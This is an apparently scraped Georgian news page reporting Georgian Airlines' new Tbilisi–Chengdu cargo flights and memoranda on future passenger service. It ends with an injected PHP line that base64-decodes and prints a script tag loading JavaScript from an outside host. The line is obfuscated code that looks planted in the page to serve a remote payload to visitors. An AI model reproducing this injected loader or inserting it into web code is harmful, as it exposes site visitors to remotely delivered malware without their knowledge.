celsiusi
ავერსი საქკაბელი

 ავიაკომპანია „ჯორჯიან ეარლაინსმა“ ჩინეთის სახალხო რესპუბლიკის ქალაქ ჩენგდუს მიმართულებით რეგულარული სატვირთო რეისები დაიწყო. ამის შესახებ ინფორმაციას „ჯორჯიან ეარლაინსი“ ავცრელებს.

ავიაკომპანიის ცნობით, ქალაქ ჩენგდუში თბილისი-ჩენგდუს რეგულარული სატვირთო ფრენების გახსნის ღონისძიება გაიმართა.

„პირველი რეგულარული სატვირთო რეისი თბილისი-ჩენგდუს მიმართულებით „ჯორჯიან ეარლანსის“ ავიახომალდმა „ბოინგ 767-მა“ შეასრულა.

„ჯორჯიან ეარლაინსი“ ჩინეთის სახალხო რესპუბლიკაში რეგულარულ სატვირთო ფრენებს ჩინურ ლოჯისტიკურ კომპანია QLD Logistics და DNJ Holding Company-სთან ერთად ახორციელებს.

ღონისძიებაზე აღინიშნა ჩინეთსა და საქართველოს შორის რეგულარული სატვირთო ავიარეისების მნიშვნელობა, ამ მიმართულებით სიხშირეების გაზრდისა და თანამშრომლობის გაღრმავების პერსპექტივები.

ღონისძიებას ესწრებოდნენ „ჯორჯიან ეარლაინს გრუპის“ პრეზიდენტი თამაზ გაიაშვილი, „ჯორჯიან ეარლაინსის“ გენერალური დირექტორი ირაკლი მეზვრიშვილი, პირველი მოადგილე ცისია ფანჩვიძე, ხოლო ჩინეთის სახალხო რესპუბლიკის მხრიდან სიჩუანის პროვინციის საგარეო საქმეთა დეპარტამენტის უფროსი, ევრაზიის განყოფილების ხელმძღვანელი, სიჩუანის შუანლიუს აეროპორტის დირექტორი და QLD Logistics და DNJ Holding Company-ს ხელმძღვანელები“, – აღნიშნულია ინფორმაციაში.

ამასთან, „ჯორჯიან ეარვეისმა“ და სიჩუანის საერთაშორისო ტურიზმის დეპარტამენტმა საქართველოსა და ჩინეთს შორის რეგულარული სამგზავრო რეისების გახსნის შესახებ ურთიერთგაგების მემორანდუმი გააფორმეს.

ხელმოწერის ცერემონია ჩინეთის სახალხო რესპუბლიკის ქალაქ ჩენგდუში გაიმართა. ურთიერთგაგების მემორანდუმს ხელი მოაწერეს „ჯორჯიან ეარლაინს გრუპის“ პრეზიდენტმა თამაზ გაიაშვილმა და სიჩუანის ტურიზმის დეპარტამენტის გენერალურმა მდივანმა და სავაჭრო პალატის თავმჯდომარემ დენგ ფანგმა.

„მემორანდუმი თბილისსა და ჩენგდუს შორის ეკონომიკური, კულტურული და ბიზნეს ურთირთობების ხელშეწყობას გულისხმობს.

მემორანდუმის ფარგლებში, ივნისიდან, დაგეგმილია “ჯორჯიან ეარვეისის” მიერ რეგულარული სამგზავრო რეისების შესრულება ჩენგდუ-თბილისის-ჩენგდუს მიმართულებით და თბილისიდან ავიაკომპანიის ოპერირებული ევროპის მიმართულებების ათვისება.

შეხვედრაზე ასევე განიხილეს ავიაბილეთების რეალიზაციის თანამედროვე პლატფორმების დანერგვისა და ტურისტული მარშრუტების პოპულარიზაციის საკითხები.

ღონისძიებას ესწრებოდნენ სიჩუანის საგარეო საქმეთა დეპარტამენტის ევრაზიის განყოფილების ხელძღვანელი იუან ჰონლინგი,
სიჩუანის საერთაშორისო ტურიზმის დეპარტამენტის მენეჯმენტი, “ჯორჯიან ეარლაინსის” გენერალური დირექტორი ირაკლი მეზვრიშვილი და პირველი მოადგილე ცისია ფანჩვიძე.

თბილისი-ჩენგდუ-თბილისის მიმართულებით რეგულარული სამგზავრო რეისებთან დაკავშირებით თანამშრომლობის მემორანდუმი ასევე კომპანია QLD Logistics-სთან გაფორმდა.

საქართველოსა და ჩინეთს შორის რეგულარული ავიარეისების გახსნის საკითხი კიდევ უფრო აქტუალური გახდა საქართველოს პრემიერ-მინისტრის ჩინეთში ვიზიტის ფარგლებში, ორ ქვეყანას შორის სტრატეგიული პარტნიორობის შესახებ ხელშეკრულების გაფორმების შემდეგ“, – აღნიშნულია „ჯორჯიან ეარლაინსის“ ინფორმაციაში.

152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");